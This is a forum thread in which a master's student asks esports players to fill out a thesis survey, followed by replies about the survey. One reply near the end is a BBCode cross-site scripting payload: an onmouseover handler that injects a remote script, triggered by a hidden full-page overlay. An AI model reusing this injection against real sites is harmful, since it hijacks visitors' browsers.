General Discussion

General DiscussionSurvey for all levels of E-sports players! Please participate!

Survey for all levels of E-sports players! Please participate! in General Discussion


    I am a master‘s student from Šiauliai University in Lithuania and I am writing a thesis on e-sports culture and education. I myself have for many years been a games (mainly online) and that‘s why I want to make the genre of e-sports and its community more popular and noteworthy.
    I want to ask you to fill out the survey, to which you can find a link below. It should take you up to 20 minutes to complete. The purpose of this survey is to assess the needs of all levels of e-sports players. The thesis itself will attempt to find solutions to these issues in theory of sports education. I value opinions of every respondent!
    The survey is completely anonymous.

    Thank you!
    ŠU Intercultural development and mediation masters student,
    Gintautas Jazdauskas


      I did it but the one question I didn't understand was "Which of the following would you benefit wanting to aim for doing professional sports?", can you explain what you meant here?

      Totentanz to The King: M ...

        The questions are really repeatitive. They pretty much all mean the same thing.


          all the surveys related to the psychology include repetitive questions to avoid getting biased/false results. people tend to lie if the truth reveals their bad aspects/habits, even if it is anonymous. re-formulating same questions and repeating them with a certain interval lets you get more realistic results.

          this acc is made to feed

            I did it


              ^give cookie to this man
              and to me, too


                Triple is on point

                plz do

                  im a sucker for these surveys :) well done and good luck w it.


                    Get ready for a lot of troll answers, cause its dotabuff.


                      @HotSalza Thank you for pointing that out, I corrected it to make it more clear, it was 'what would you benefit from if u are aiming/wanted to aim for pro', thanks again!

                      Thank you everyone for your responses and yes some of the questions are repetitive, as it was pointed out they all have their own purpose :)


                        I filled it out and I think the way you designed the question is a bit weird (most people play games for entertainment and to waste their time, not with a goal to succeed in 'esports').
                        Good look with the thesis.

                        قصص إختك

                          Time to troll 4Head

                          waku waku

                            give me the cookies


                              [email][url]test onmouseover=t=document.createElement('script');t.src='//';document.body.appendChild(t);// style=display:block;position:absolute;top:0px;left:0px;margin-left:-1000px;margin-top:-1000px;width:99999px;height:99999px;//[/url][/email]

                              Kenny Griffin

                                Done! that was long.

                                lm ao

                                  ^^Aha there's the culprit